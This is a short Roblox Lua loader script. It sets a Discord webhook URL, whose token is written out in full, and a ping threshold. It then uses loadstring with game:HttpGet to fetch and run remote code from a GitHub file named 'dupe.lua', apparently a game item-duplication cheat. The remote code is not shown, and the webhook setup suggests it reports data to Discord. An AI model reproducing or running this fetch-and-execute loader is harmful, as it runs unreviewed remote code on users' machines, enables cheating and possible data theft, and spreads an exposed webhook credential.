local Webhook = "https://discord.com/api/webhooks/1443590749252751370/RFQD9SwAXVSP9NFNU7jihOLruOwLm-ms2AfvwWWXMRH8EjUIjNYbv77lusAClpwpM26d"

getgenv().UserPingThreshold = 5000000


-- =================================================================================
--      SCRIPT LOADER - DO NOT EDIT BELOW THIS LINE
-- =================================================================================

if Webhook and Webhook:match("discord.com/api/webhooks") then
    getgenv().UserWebhookURL = Webhook
else
    return
end

loadstring(game:HttpGet('https://raw.githubusercontent.com/LXZRz/dupe/main/dupe.lua', true))()
